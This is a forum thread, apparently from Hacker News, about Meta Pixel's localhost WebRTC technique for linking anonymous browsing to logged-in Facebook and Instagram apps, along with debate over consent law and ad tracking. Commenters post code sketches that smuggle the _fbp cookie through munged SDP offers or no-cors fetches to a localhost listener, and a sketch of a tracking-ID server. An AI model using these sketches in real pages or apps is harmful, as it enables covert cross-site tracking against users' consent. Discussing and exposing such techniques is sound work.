1. User is logged into the FB or IG app. The app runs in the background and listens for incoming traffic on specific ports.
2. User visits a website in the phone's browser, say something-embarrassing.com, which happens to have a Meta Pixel embedded. Per the article, the Meta Pixel is embedded on over 5.8 million websites. Even in Incognito mode, the user will still get tracked.
3. The website might ask for the user's consent depending on location. The article doesn't elaborate; presumably this is the cookie banner that many people automatically accept to get on with their browsing?
4. > The Meta Pixel script sends the _fbp cookie (containing browsing info) to the native Instagram or Facebook app via WebRTC (STUN) SDP Munging.
You won't see this in your browser's dev tools.
5. Through the logged-in app, Meta can now associate the "anonymous" browser activity with the logged-in user. The app relays the _fbp info and user ID to Meta's servers.
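For the curious, here's a minimal sketch of what the "SDP munging" in step 4 can look like from the page's side, in TypeScript. All names and the localhost details are illustrative assumptions, not Meta's actual script:

```typescript
// Hypothetical sketch: smuggle a value (e.g. the _fbp cookie) into the
// ICE username fragment of a munged SDP offer. During ICE connectivity
// checks the browser then emits STUN binding requests carrying that
// value, and a cooperating native app listening on a localhost port can
// read it. None of this shows up in dev tools' network tab.
async function leakViaSdpMunging(payload: string): Promise<void> {
  const pc = new RTCPeerConnection();
  pc.createDataChannel("x"); // kick off ICE gathering
  const offer = await pc.createOffer();
  // "Munging": rewrite the SDP before handing it back to the browser.
  const munged = offer.sdp!.replace(/a=ice-ufrag:.*/g, `a=ice-ufrag:${payload}`);
  await pc.setLocalDescription({ type: "offer", sdp: munged });
  // (The real attack also supplies a crafted remote description whose
  // candidate points at 127.0.0.1:<port>, so the checks target localhost.)
}
```

This munging step is the trick Chrome developers said they would disable, which is why the script later moved to the TURN-based variant mentioned below that doesn't need it.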
Also noteworthy:
> This web-to-app ID sharing method bypasses typical privacy protections such as clearing cookies, Incognito Mode and Android's permission controls. Worse, it opens the door for potentially malicious apps eavesdropping on users’ web activity.
> On or around May 17th, Meta Pixel added a new method to their script that sends the _fbp cookie using WebRTC TURN instead of STUN. The new TURN method avoids SDP Munging, which Chrome developers publicly announced to disable following our disclosure. As of June 2, 2025, we have not observed the Facebook or Instagram applications actively listening on these new ports.
Thank you! This was a powerful reminder of how important it is to be careful with our words and cover all possibilities when commenting, and additionally, to hold ourselves to account for our reading. I was a bit stunned at how I just sort of...flitted through? browsed? skimmed?...well, let's put it plainly: irresponsibly claimed to myself to have read and understood this. Meanwhile, I had completely neglected to notice that this goes far beyond embarrassment. It's quite damning that I entirely missed that the consequences of someone knowing someone's entire browsing history aren't just mere "embarrassment": first, there are plenty of contexts where it could even lead to state activity and my eventual imprisonment. We can even show that some countries punish the family still in a given country for the perceived "sins" (shorthand; I mean violating laws / actions against power, apologies for sloppiness here) of an individual outside the country. I should have at least thought to acknowledge that it could go beyond embarrassment - your framing may even be too polite to readers like me, who neglected to consider this.
So the main application for WebRTC is de-anonymisation of users (for example, getting their local IP address). Why it is not hidden behind a permission, I don't understand.
The main application for WebRTC is peer-to-peer data transfer.
I think you can make the argument that it should be behind a permission prompt these days but it's difficult. What would the permission prompt actually say, in easy to understand layman's terms? "This web site would like to transfer data from your computer to another computer in a way that could potentially identify you"? How many users are going to be able to make an informed choice after reading that?
If users don't understand, they click whatever. If the website really needs it to operate, it will explain why before requesting, just like apps do now.
Always assume users are a little more knowledgeable than you think they are.
And specifically, if you're on something-sensitive.com in a private browsing session, it would give you the choice of giving no optional permissions. That choice is better than no choice at all, especially in a world where Meta can be subpoenaed for this tracking data by actors who may be acting unconstitutionally without sufficient oversight.
That feels pretty useless. You might as well do what happens today: enable it by default and allow knowledgeable power users to disable it. If it's disabled, show a message to the user explaining why it's needed.
it does exist in `about:config`, and could be made a UI setting instead:
`media.peerconnection.enabled`.
On Cromite[1], a hardened Chromium fork, there is such a setting, both in the settings page and when you click the lock icon in the address bar.
I think very few people would argue that cookie consent banners, in the form in which they are the norm, are a good thing the way permission prompts for microphone access are.
Browser functionality needs a hard segmentation into disparate categories like "pages" and "apps". For example, Pages that you're merely intending to view don't need WebRTC (or really any sort of network access beyond the originating site, and even this is questionable). And you'd only give something App functionality if it was from a trustable source and the intent was to use it as general software. This would go a long way to solving the other fingerprinting security vulnerabilities, because Pages don't need to be using functionality like Canvas, USB, etc.
It's only "profitable" if people don't bounce at being asked to trust a random news article, or something-embarassing.com, with their personal information. Same as why native Android apps don't just ask for every single permission. People in general do care about their security, they just lack tools to effectively protect it.
When enrolling Yubikeys and similar devices, Firefox sometimes warns "This website requires extra information about your security device which might affect your privacy. Do you want to give this information? Refusing might cause the process to fail."
I wouldn't understand that. Is it getting a manufacturer address to block some devices? Does it use a key to encrypt something? Which "security device"? /dev/urandom?
I see that non-technical users can be confused by too much information, but when you omit this even knowledgeable users can't make an informed decision.
1- You'd be on a page where you're enrolling your YubiKey or WebAuthn device. You'd have your key at hand, or recently plugged in.
2- Your device's LED would be flashing, and you'd be pressing the button on your device.
3- The warning pops up at that moment, asking you that question. This means the website is probably querying for something like the serial number of your key, which increases security but reduces your privacy.
With the context at hand, you'd understand that instantly, because the place you are and the thing you're doing complete the picture perfectly, and you're in control of every step of the procedure.
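In case it helps to pin down what the site is doing at that moment: the warning generally corresponds to a WebAuthn enrollment that requests attestation, which can identify the make and model of your authenticator. A hedged sketch (all identifiers are placeholders):

```typescript
// Illustrative WebAuthn enrollment asking for "direct" attestation:
// the request that can expose details about the security key itself
// (via its attestation certificate) and so triggers the privacy prompt.
// attestation: "none" would skip that and avoid the warning.
const credential = await navigator.credentials.create({
  publicKey: {
    challenge: crypto.getRandomValues(new Uint8Array(32)), // from the server in practice
    rp: { id: "example.com", name: "Example Site" },
    user: {
      id: new TextEncoder().encode("user-1234"),
      name: "user@example.com",
      displayName: "Example User",
    },
    pubKeyCredParams: [{ type: "public-key", alg: -7 }], // ES256
    attestation: "direct",
  },
});
```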
Exactly. You need to infer that, it isn't stated directly.
Just like you need to guess that "Unable to connect" means the connection was refused, while "We can’t connect to the server at a" means the DNS request failed. Or does it mean no route to host? Network is unreachable?
I would argue that (sometimes) the user would be fine distinguishing whether he wants to approve something, but can't, because both dialogs state the same wishy-washy message. Even non-technical users (might) eventually learn the proper terms, but they can't if they are only shown meaningless statements.
> Exactly. You need to infer that, it isn't stated directly.
I don't care. The site is doing something unusual. It's evident, it's enough to take a second look and think about it.
> Same like you need to guess, that "Unable to connect" means...
Again, as a layman, I don't care. As a sysadmin, I don't worry, because I can look into it in three seconds flat. Also, Unable to Connect comes with its reasons in parentheses all the time.
> I don't care. The site is doing something unusual. It's evident, it's enough to take a second look and think about it.
Is it enough to make an informed decision?
> Again, as a layman, I don't care.
You do care, whether you mistyped or the network is down. I agree that you probably don't care to distinguish between "network unreachable" and "no route to host" though.
> As a sysadmin
True, but that information was already there and was thrown away.
Let's be clear here. Meta and other sites are abusing TURN/WebRTC technology for a purpose it was never intended for, way beyond the comfortable confines of innocent hackery, and we all know it.
That's asshole behavior, and worth naming, shaming, and ostracizing over.
> That's asshole behavior, and worth naming, shaming, and ostracizing over.
These exploits are being developed, distributed and orchestrated by Meta. The “millions of websites” are just hummus-recipe content farms using their ad SDKs, and are downstream of Zuck in every meaningful interpretation of the term.
Meta has been named and shamed for decades. Shame only works in a society where bad actors are punished by the masses of people that constitute Meta’s products. Doesn’t mean we should stop, only that it’s not enough.
More than that, talking about TURN or WebRTC is really missing the issue. If you lock everything down so that no one can do anything you wouldn't want a malicious actor to be able to do, then no one can do anything.
The real issue is, why are we putting up with having these apps on our devices? Why do we have laws that prohibit you from e.g. using a third party app from a trusted party or with published source code in order to access the Facebook service, instead of the untrustworthy official app which is evidently actual malware?
What laws are you referring to other than Terms of Service, which are entirely artificial constructs whisked into existence by service/platform providers? Which will, admittedly, be as draconian and one-sided as the courts will allow.
Agree on your first point at a practical level, but from a normative standpoint, it's unforgivable to cross those streams. At the point we're talking about, with a service provider desperately wanting to leak IP info for marketability applications of an underlying dataset, and using technical primitives completely unrelated to the task at hand to do it, you very clearly have the device doing something the end user doesn't want or intend. The problem is that FAANG have turned the concept of general computing on its head by making every bloody handset a playground for the programmer, with no easily grokkable interface for the user to curtail the worst behavior of technically savvy bad actors. A connection to a TURN server, or use of parts of the RTC stack, should explain to the user that they are about to engage programming intended for real-time communication, when it's happening, not just once at the beginning, when most users would just accept it and ignore it from then on.
Ten or so TURN-call notifications in a context where synchronous RTC isn't involved should make it obvious that something nefarious is going on, and would actually give the user insight into what is running on the phone. That's something modern devs seem to be allergic to, because it would force them to confront the sketchiness of what they are implementing instead of being transparent, per the principle of least surprise.
Modern businesses, though, would crumble under such a model, because they want to hide as much of what they are doing as possible from their customer base/competitors/regulators.
> What laws are you referring to other than Terms of Service, which are entirely artificial constructs whisked into existence by service/platform providers? Which will, admittedly, be as draconian and one-sided as the courts will allow.
There are two main ones.
The first is the CFAA, which by its terms would turn those ToS violations into a serious felony, if violations of the ToS means your access is "unauthorized". Courts have been variously skeptical of that interpretation because of its obvious absurdity, but when it's megacorp vs. small business or open source project, you're often not even getting into court because the party trying to interoperate immediately folds. Especially when the penalties are that scary. It's also a worthless piece of legislation because the actual bad things people do after actual unauthorized access are all separately illegal, so the penalty for unauthorized access by itself should be no more than a minor misdemeanor, and then it makes no sense as a federal law because that sort of thing isn't worth a federal prosecutor's time. Which implies we should just get rid of it.
The other one, and this one gets you twice, is DMCA 1201. It's nominally about circumventing DRM but its actual purpose is that Hollywood wants to monopolize the playback devices, which is exactly the thing we're talking about. Someone wants to make an app where you can watch videos on any streaming service you subscribe to and make recommendations (but the recommendations might be to content on YouTube or another non-Hollywood service), or block ads etc. The content providers use the law to prevent this by sticking some DRM on the stream to make it illegal for a third party app to decrypt it. Facebook can do the same thing by claiming that other users' posts are "copyrighted works".
And then the same law is used by the phone platforms to lock users out of competing platforms and app stores. You want to make your competing phone platform and have it run existing Android apps, or use microG instead of Google Play, but now Netflix is broken and so is your bank app so normal people won't put up with that and the competition is thwarted. Then Facebook goes to the now-monopoly Google Play Store and has "unauthorized" third party Facebook readers removed.
These things should be illegal the other way around. Adversarial interoperability should be a right and thwarting it should be a crime, i.e. an antitrust violation.
> The problem is that FAANG have turned the concept of general computing on its head by making every bloody handset a playground for the programmer, with no easily grokkable interface for the user to curtail the worst behavior of technically savvy bad actors.
But how do you suppose that happened? Why isn't there a popular Android fork which runs all the same apps but provides a better permissions model or greater visibility into what apps are doing?
>Why isn't there a popular Android fork which runs all the same apps but provides a better permissions model or greater visibility into what apps are doing?
Besides every possible attempt being DOA because Google is intent on monopolizing the space with their ToS and OEM terms? There isn't a fork, because it can't be Android if you do that sort of thing, and if you tried, it'd be you vs. Google. Never mind the bloody rat's nest of intentionally one-sided architecture decisions made to ensure the modern smartphone is first and foremost a consumption device instead of a usable and configurable tool, which includes things like regulations around the baseband processor, lawful interception/MITM capability, and meddling, as you mentioned, in the name of DMCA 1201.
Though there's an even more subtle reason why, too: the lack of accessible system developer documentation, the inability to write custom firmware, and missing architecture documentation. It's all NDA-locked IP, and completely blobbed.
The will is there amongst people to support things, but the legal power edifice has constructed intentional info asymmetries in order to keep the majority of the population under some semblance of controlled behavior through the shaping of the legal landscape and incentive structures.
> The will is there amongst people to support things, but the legal power edifice has constructed intentional info asymmetries in order to keep the majority of the population under some semblance of controlled behavior through the shaping of the legal landscape and incentive structures.
Exactly. We have bad laws and therefore bad outcomes. To get better outcomes we need better laws.
There are already permissions dialogs for using the camera/microphone. I don't think it'd be absurd to implicitly grant WebRTC permissions alongside that.
> The website wants to connect to another computer|another app on your computer.
"website wants to connect to another computer" basically describes all websites. Do you really expect the average user to understand the difference? The exploit is also non-trivial either. SDP and TURN aren't privacy risks in and of themselves. They only pose risks when the server is set to localhost and with a cooperating app.
Pardon my ignorance, but modern browsers won't even load assets or iframes over plain HTTP within an SSL page. So under normal circumstances you cannot open so much as an iframe to "localhost" from an https URL unless you've configured HTTPS locally, regardless of cross-domain perms. Wouldn't you want to require a special security permission from an app that was trying to set up a local server, AND require confirmation from a browser that was trying to connect to a local server?
HTTP isn't allowed on secure pages because the security of HTTP is known to be non-existent. WebRTC uses datagram TLS, which is approximately on par with HTTPS.
The thing that's happening here isn't really a problem with WebRTC. Compare this to having an app on your phone that listens on an arbitrary port and spits out a unique tracking ID to anything that connects. Does it matter if the connection is made using HTTP or HTTPS or WebRTC or something else? Not really. The actual problem is that you installed malware on your phone.
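To make the comparison concrete, here's a hedged sketch of that hypothetical app-side listener (TypeScript/Node; the port and ID are made up). The transport is interchangeable, which is the point:

```typescript
// A (malicious) app that listens on a fixed localhost port and hands a
// stable per-device tracking ID to anything that connects.
import { createServer } from "node:http";

const TRACKING_ID = "device-1234"; // real malware: a persistent unique ID

createServer((_req, res) => {
  // Permissive CORS so any web page's fetch() can read the response.
  res.setHeader("Access-Control-Allow-Origin", "*");
  res.end(TRACKING_ID);
}).listen(12387, "127.0.0.1");
```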
But that says nothing about the danger of identifying you.
> Most users probably will click "No"
Strong disagree. When I'm loading google.com is my computer not connecting to another computer? From a layman's perspective this is the basis of the internet doing what it does. Not to mention, the vast majority of users say yes to pretty much any permission prompt you put in front of them.
The existing killer app for WebRTC is video chat without installing an app, which is huge.
Other P2P uses are very cool and interesting as well - abusing it for fingerprinting is just that, abusing a user-positive feature and twisting it for identification, just like a million other browser features.
The technique doesn't actually rely on WebRTC though, does it? Not showing up in the default view of Chrome's network inspector obfuscates it a bit, but it's not like there aren't other ways to do what they're achieving here.
Because the decision makers don't care about privacy, they only want you to think that you have privacy, thus enabling even more spying.
One solution is to not use the apps and websites from companies that are known to abuse WebRTC or something else.
This is not unique to WebRTC. The same result could be achieved by sending an HTTP request to localhost. The only difference in this case is that using WebRTC doesn't log an HTTP request.
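Something like this, as a hedged sketch (TypeScript; the port is illustrative, assuming a cooperating app is listening):

```typescript
// Same exfiltration idea over plain HTTP instead of WebRTC. With
// mode "no-cors" the page never reads a response, so no CORS handshake
// is needed; the request alone delivers the cookie to the local app.
// http://localhost is exempt from mixed-content blocking, so this works
// even from an HTTPS page.
function sendFbpOverHttp(fbpCookie: string): void {
  fetch("http://localhost:12387/", {
    method: "POST",
    mode: "no-cors",
    body: fbpCookie,
  }).catch(() => { /* no listener present; fail silently */ });
}
```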
Not totally following but it sounds like you are saying one of the things they have been doing involves abusing mandated GDPR cookie notices to secretly track people?
Yes? The cookie in question is first-party, which means you’ve consented to permitting only that party to track you using it, and not to its use for wider behavioral tracking across websites.
However, the locally hosted FB/Yandex listener receives all of these first-party cookies, from all parties, and the OP's implication is (I think) that these first-party cookies, which by consent should not be correlatable, can be or are being used to track you across all sites that use them.
Not only did you consent to only the one party using it, but the browser has robust protections in place to ensure that these cookies are only usable by that party. This “hack” gets around the restriction completely, leveraging a local service to aggregate all the cookies across sites.
This is why things involving cookies as permission tokens were real poison pills. As long as there is a cookie to be tracked, any at all, you have the data-exfil/tracking problem. The only thing that changes is where the aggregation happens.
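To make the first-party mechanics concrete, a small sketch (TypeScript). Each site's embedded script can only read that site's own _fbp, which is exactly why funneling them all to one localhost listener defeats the isolation:

```typescript
// Standard document.cookie parsing: the script on site A sees only
// site A's first-party _fbp value.
function readFbp(): string | undefined {
  return document.cookie
    .split("; ")
    .find((c) => c.startsWith("_fbp="))
    ?.split("=")[1];
}
// If every site's copy of the script forwards its own _fbp to the same
// local app, that app ends up holding all of them, joined to one
// logged-in identity.
```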
IANAL, but it's not GDPR-conformant consent in any way. Consent needs to be informed, unambiguous, and freely given to be valid and should be easy to reject. The only way for this to be valid would be a consent form with something like:
Allow Meta tracking to connect the Facebook or Instagram app on your device to associate visits to this website with your Meta account. Yes/No (With No selected as a default.)
I am pretty sure that this is a grave violation of the GDPR.
That's probably already part of the consent form websites pop up listing 200 different trackers. If you permit data sharing with Facebook/IG/Meta in the consent form, you're consenting to tracking in general, not just cookie-based tracking.
"No" doesn't even need to be selected as a default, as long as you don't use dark patterns. Making the user manually click yes or no is perfectly valid (as long as you don't make "yes" easier than "no", so if you add an "allow all" button there should be an equally prominent "deny all" button).
The intent of these laws is just so obtuse and unclear! And beyond that complying is technically impossible to implement but you could only understand that if you were a rocket scientist PhD computer science wizkid making $$$$k in California which isn't that much in such a high cost of living area donchaknow. /sardonic
The cookie preference pop-up is itself a cookie: to track your preference, they need one. We legally mandated a cookie. They're using the cookie regardless. But no one will call them on it until a critical mass of cases is reached in a sufficiently large number of jurisdictions to curtail the behavior.
A reminder that it's possible to use tools like XPL-EX to circumvent those attempts. Ad blocking via AdAway would also do the trick here, I assume, as it should block Meta Pixel tracking. Overall, an awful approach.
I wish we could just ban advertising and tracking on the internet. I feel like so much crap these days has come out of it, all so that CEOs can afford an extra yacht.
It's already enough to just have plain ads, like we have them on the streets, at the bus station, in newspapers, etc. No tracking needed at all; just put out the message. If you need targeting, target the context of the place or content the ad is shown with. You don't need to know anything about the user seeing the ad. Targeting by user doesn't work anyway.
Take the frontend side, with Facebook, which thinks that if I'm interested in cycling I will also be interested in cars (both are on the street, right?), or that if I'm into somewhat dirty humor I also want to see more "naughty" stuff.
And on the backend side, used by magazines: they mostly don't use the user profiles, because targeting that narrowly doesn't yield enough audience. And if you make the targeting broad enough, you'll again have people interested in chocolate being targeted with wine and whiskey.
Or, even better, on Amazon, where you can buy a new TV, and once you have done so it will suggest even more TVs to you for the next few months.
Depending on the data you collect, targeting by user - unfortunately - works. If the granularity is not one user, it will be a hundred. If not, a thousand, and so on. I've seen apps run ads targeting a total of 5 cohorts (together holding a hundred million users), and I've seen companies run ads targeting 100s of cohorts with the same number of users. They all work better than no targeting at all.
However, what you're saying isn't completely wrong. I've also seen user targeting become a self-fulfilling prophecy. What happens is that it's championed by a high-level executive as the panacea for improving revenue, implemented, and seen to not work. Now, as we all know, the C*O is Always Correct, so everything else around it is modified until the user-level targeting A/B test shows positive results. Usually this ends with the product being tortured into an unusable mess.
Before you target 5 different cohorts, it's better to target the context where the ad is shown. Web content normally already has a category, and people reading an article about cheap flats in a city might be very much interested in renting or buying a flat. By collecting signals on a user, you might only pick up that interest after a longer time, if you even have a profile, and by the time you pick it up they might have a new flat and no longer be interested.
Yes, definitely. User-level targeting comes after targeting particular ad spaces in some ad platforms. But it still adds enough marginal value to be useful.
I don't think it has to go that far. I think there's a middle ground here that people would accept: show us ads, but make it a one-way firehose, like TV and billboards. If you need to advertise to pay for the site, put up all the banners you want. But don't try to single me out for a specific one.
If it could pay for network TV there's no reason it can't pay for a website.
(You could still do audience-level tracking, e.g. "Facebook and NCIS are both for old people, so advertise cruises and geriatric health services on those properties.")
Reddit has fairly extensive device fingerprinting. And they are selling data for training AI models. It's only a matter of time before there is some premium phone app that monetizes data that otherwise isn't available/for sale.
This type of thing is pure greed, completely distinct from a highly aggressive pursuit of far more lucrative opportunities that average businessmen have been able to accomplish in the extreme interest of their shareholders.
Those true leaders are the traditional examples who have shown success over the centuries without letting any greed whatsoever become a dominant force, recognizing, and moving in the opposite direction from, those driven by overblown self-interest, who naturally have little else to offer. It can be really disgraceful these days, but people don't seem to care any more.
That's one thing that made them average businessmen though.
Now, if you're below average, I understand, but most companies' shareholders would be better off with a non-greedy CEO, one who outperforms by steering away from underhanded, low-class behavior instead.
Now, if greed is the only thing on the table, and somebody like a CEO or decision-making executive hammers away with his one little tool with admirable perseverance for long enough, it does seem likely to bring in money that would not otherwise have come in.
This can be leveraged too, by sometimes even greedier forces.
All you can do is laugh; those shareholders might be satisfied, but just imagine what an average person could do with that kind of resources. It would put the greedy cretins to shame on their own terms.
And if you could find an honest above-average CEO, woo hoo!
The majority of internet users are either unwilling or unable to pay for content, and so far advertising has been the best business model to allow these users to access content without paying. Do you have a better suggestion?
They are able, because in the end advertising is also paid for by customers. The complications are:
- Paying for services is very visible, whereas the payment for advertising is so indirect that you do not feel like you are paying for it.
- The payments for advertising are not uniformly distributed; people with more disposable income most likely pay a larger share of overall advertising. Subscriptions, by contrast, cannot make distinctions based on income.
- People with disposable income are typically the most willing to pay for services. However, they are also the most interesting to advertisers. For this reason, payment in place of ads is often not an option at all, because it is not attractive to websites/services.
I think banning advertising would be good. But a first step towards that would be completely banning tracking. That would make advertisements less effective (and consequently less valuable) and would push services to look for other streams of income. Plus, it would solve the privacy issue of advertising.
It's a game. When a merchant signs up to an ad platform (or when the platform is in need of volume), they are given good ROI, and the merchant plays along and treats it as "marketing expenditure". Eventually the ROI dries up, i.e. the marketing has saturated, and the merchant starts counting it as a cost and passes it on to the customer. I don't know if this is actually done, but it's also trivial for an ad platform to force merchants to continue ads by making them feel they're important: when a merchant reduces their ad volume, just boost the ROI and visibility for their competitors (a competitor can be detected purely by shared ad space, no need to do any separate tagging). Heck, this is probably what whatever optimization algorithm they are running will end up suggesting, as it's a local minimum in feature space.
And yes, instead of banning ads, which would be too wide a legal net to be feasible, banning tracking is better. However, even this is complicated. For example, N websites can have legitimate uses for N browser features, but it turns out any M of the N features can be used to uniquely identify you. Oops. What can you even do about that, legally speaking? Don't say permissions; most people I know just click allow on all of them.
I think that might be a rhetorical device bequeathed to you by the social media companies.
People of course do pay for things all the time. It's just that the social media folks found a way to make a lot more money than people would otherwise pay, through advertising. And in this situation, through illegal advertising.
The best thing we can all do is refuse to work for Meta. If good engineers did that, there would be no Meta. Problem solved. But it seems many engineers prefer it this way.
Sure, this entire business model has been cataclysmic for traditional media organizations and news outlets, and people's trust in institutions has plummeted in correlation, so let's just fucking scrap it and go back to paid media.
Manufacturing Consent identified advertising as one of its five filters, and it was published in 1988. It is and was extremely rare for a magazine or newspaper to not be at least partially funded by advertisements.
>The majority of internet users are either unwilling or unable to pay for content
Except for Spotify, news subscriptions, video game subscriptions, video streaming services, Duolingo, donations, GoFundMes, piracy services(!), clothing and food subscriptions(!), etc. etc.
People pay $10 for a new Fortnite skin. You're really pretending they won't pay for content?
People were willing to pay for stuff on the internet even when you could only do so by calling someone up and reading off your credit card number and just trusting a stranger.
Meanwhile, the norm until cable television for "free" things like news was that you either paid, or you went to the library to read it for free.
By defining the $thing, banning the $thing per that definition by law, and then tasking an FBI-like organization with enforcing the law. It won't completely go away, but it will subside, like how Internet gambling has been split in two and confined to loot-box games without cash-out features on one side and straight-up scam underground casinos on the other.
Personally, I think we should start by separating good old ads (the kind that existed before I was 15) from Internet "ads". The old ads were still somewhat heavily targeted, but less so than now. There would probably be an agreeable line up to which advertisement efforts can be perverted.
I mean, the comparison of ‘old’ ads vs. new ads is interesting in itself; old ads already abide by far more regulation and are far more auditable. Simply bringing digital ads in line would be a big step forward.
Some examples:
In most countries it’s illegal to ‘target minors’, and there are restrictions on what ads can run during after-school hours. Meta has always allowed age targeting down to 13 and has no time-of-day restrictions.
In parts of New Zealand you can’t advertise alcohol between 10PM and 9AM… unless you do it on Meta or Google.
Most countries have regulations about promoting casinos (or bans on doing so), unless they’re digital casinos being promoted in digital ads.
Or just look at the deepfake finance and crypto ads that run on Meta and X. Meta requires 24 strikes against an advertiser before they pull them down, if a TV network ran just one ad like that it would be a scandal.
Auditability is the biggest issue, IMO. If a TV ad runs, we can all see it at the same time and know it ran. That is simply impossible with digital ads, and even when Meta releases some tools for auditing, the caveat is that you still have to trust what they're releasing. Similarly with data protection: there's no way to truly audit what they're doing unless you install government agencies in the companies to provide oversight, and I don't see how you could really make that work.
It would be nice if they also couldn't target us with more information than what we consent to give them. Like, fine, if you want to target facebook ads at people using details they've filled in, I can see that being acceptable, but trying to scrape every single byte of data about us and using that to throw targeted ads at us feels icky.
Better moderation of crappy AI-generated image ads that are just scamming you would be nice as well.
All we need to do is define the $thing and mandate that lawsuits can be effective.
No agency enforces that potato chips need to fill up 92% of the bag or whatever, or that McDonald's cannot show pictures of apple fritters with more apples than they actually come with (this happened).
You just incentivize a cottage industry of legal firms that can squeeze a profit out of suing peanut butter companies for labelling incorrectly or advertising dishonestly, and it sort of takes care of itself.
I think the main problem is that lots of money is made from it, and money influences politics hugely. The technical difficulties are low on the list of reasons this is not happening.
I like the idea, but where do you draw the line on what advertising is?
Is affiliate marketing still allowed? Are influencers allowed to take payment? Can people be a spokesperson for a company? Can newspapers run commentary about businesses? Can companies pay to be vendors at a conference?
No matter where you end up drawing the line you’re just shifting the problems somewhere else. Look at the amount of money Meta and Google make, the incentive is just too large.
A lot of things I would have previously said were impossible have happened in the last half year. If only a few of those things were of the impossibly good type.
...and so consumers can use services/products without having to fork over money.
People love the ad model. Given the option to pay or use the "ad-supported" option, the ad-supported one wins 10 to 1. This means in many cases it doesn't even make sense to have a paid option, because the ad option is just so much more popular.
As bad as crypto is, with all the negative things attached to it, BAT was probably one of the smartest things to be invented. A browser token that automatically dispenses micropayments to websites you visit. Forget all the details to get snagged on, the basic premise is solid: Pay for what you use. You become the customer, not the advertisers.
Also, a note about ad-blocking: it only makes the problem worse. It is not a "stick it to the man" protest. You protest things by boycotting them or paying their competitors, not by using them without compensating them.
There is no such thing as a free lunch. Consumers on average are forking over the money. Otherwise no one would pay for advertising. And they are paying more than they would have otherwise since this dystopian tracking apparatus isn't free either.
Yes, we need ads for a free internet, today. And, as a result, we also have our privacy eroded - eroded in ways we may not care about today, but will probably regret tomorrow.
If we must pay for the internet, give me an option to pay to use it where I see no ads and my privacy is preserved. Let me know what that cost is and I'll decide what I want to do.
Right now, the actual pricing is obscured so we just "accept" that the internet in its current form is how it needs to be.
I really liked the concept of BAT but the reality left me wanting.
Things like "we'll hang on to the tokens of sites that don't use BAT yet for them until they join" gave negative vibes.
It all felt a little underbaked. I swing back to Brave once in a blue moon and then remember I've got at least $20 worth of BAT lost forever somewhere.
I'm not a big fan of it or anything, it's just the only crypto I know that was targeting that idea.
I'd love if there was another one that was totally open and just a browser extension away. But I do not think it would ever get off the ground because...
People love the ad model and hate paying for things.
The deprecation of third-party cookies, which all browsers were at one point on track to implement, was pretty much the most realistic first step toward that. Which is why Google killed it last year by leveraging their control over Chrome.
While not technically a crime, it was a disgusting, unethical market manipulation move that never really got the public outrage it deserved.
Google execs’ initial support for it was also telling: leadership at Google must literally have thought they would find another way to stay as profitable as they are without third-party cookies. Put another way: Google leadership didn’t understand cookies as well as someone who’s taken a single undergrad web dev class. (Or they were lying all along, and always planned to “renege” on third-party cookie deprecation.)
I don't think that's quite what happened. Google got into antitrust trouble because they have an unfair advantage in user tracking, given logged-in Chrome accounts. Removing third-party cookies hurts other privacy-invading companies without substantially affecting Google. It was still somewhat on track to be removed from Chrome until they lost their antitrust battle and Chrome was required to be spun off. With Chrome's new future and Google's new legal constraints, there's less incentive to try to make Privacy Sandbox work. At least, that was my understanding; I didn't follow it all that closely.
This is very misleading. Google was prevented from disabling third-party cookies due to intervention by the CMA, who felt it would provide an unfair advantage over other advertisers. Google argued their case for years, proposed competing standards to act as a replacement (see Topics API), and eventually gave up on the endeavour altogether and simply made it a user toggle.
Google gets no competitive advantage from removing third-party cookies from Chrome. The anticompetitive, monopolistic tactic was the plan to replace third-party cookies with FLoC/Privacy Sandbox/Topics API, and THAT is what they were prevented from doing.
No one is trying to stop google from removing third party cookies. Google is just unwilling to remove them without introducing a new anticompetitive tracking tool to replace them.
> No one is trying to stop google from removing third party cookies.
That's simply not true. As I already mentioned, the CMA presented a legal challenge which you can read about online. Please review the history, as it's been going on for years now.
The first link confirms exactly what I said above. They’re not preventing Google from removing third party cookies, they’re preventing Google from implementing ALTERNATIVES to third party cookies. The only reason Google is unwilling to straight up remove third party cookies is their business model.
> The CMA was concerned that, without regulatory oversight and scrutiny, Google’s alternatives could be developed and implemented in ways that impede competition in digital advertising markets. This would cause advertising spending to become even more concentrated on Google, harming consumers who ultimately pay for the cost of advertising. It would also undermine the ability of online publishers such as newspapers to generate revenue and continue to produce valuable content in the future.
The second link does contain the phrase “cannot proceed with third-party cookie deprecation”, but it’s simply obvious that it’s not about third party cookies per se. It’s all about Google’s (unnecessary, anticompetitive, anti-user, anti-privacy) replacements for third party cookies.
> … report on the implementation of Google’s Privacy Sandbox commitments, the regulator has said that although the tech giant is so far complying with its demands, there remain considerable areas of concerns …
> …
> That it must not “design, develop or use the Privacy Sandbox proposals in ways that reinforce the existing market position of its advertising products and services, including Google Ad Manager”
> …
> It must also address issues with specific Sandbox tools such as how its Topics API targeting alternative can harm smaller tech business, and clarify who will govern the Topics API taxonomy.
It is true that the CMA is concerned with the new API proposals within the Privacy Sandbox such as Topics. However, this is from an anti-competitive angle, rather than privacy. Their goal is to ensure market fairness.
As part of that same process, they have put considerable friction in place for removing third-party cookies. They've deemed that the removal of third-party cookies could give Google an unfair market advantage, and that is why they're concerned with finding an alternative solution to replace them. This has been a very slow process, and involves many discussions and debates with regulators. That has had significant influence on the design of the Topics API.
To provide a more direct example, the CMA have also put specific stalls into the deprecation process, such as the standstill period invoked last year:
> The CMA will start a formal review of Google’s plan to deprecate cookies and Chrome’s Privacy Sandbox replacements once Google triggers a 60-day standstill period, likely at the beginning of the third quarter. During this standstill, the tech giant is forbidden to put in motion any deprecation procedures on Chrome. ... If they can’t reach an agreement, the 60-day standstill period will become 120 days.
To put it simply, third-party cookies would have been dead and buried long ago if this dispute were not happening. It may be possible for Google to remove third-party cookies without a replacement, but they'd be risking a significant lawsuit and contravention of UK authority by doing so.
That stemmed from “dammit Google, now every SaaS developer has to work nights to meet your arbitrary deadline”; here we’re caring more about the impact on us as consumers. It’s OK to think about things in two ways.
source: a developer who actually did have to do this (and did it, and now didn’t have to, but it’s done)
That's a bit ironic, considering they're using any side channel they can lay their hands on (e.g. Wi-Fi AP names) to track everyone. Basically every large app vendor with multiple apps does something similar to circumvent OS restrictions as well.
The EU should set some record breaking fines for this.
Maybe it's time to invent a tax that starts at 0% and goes up 1-X% every time your hand is caught in the cookie jar. And add a corresponding website where you can clearly see all violations by company.
I agree they should. But I don't think the EU has any real ability to send American tech execs to jail. At most they can stop them doing business in the EU.
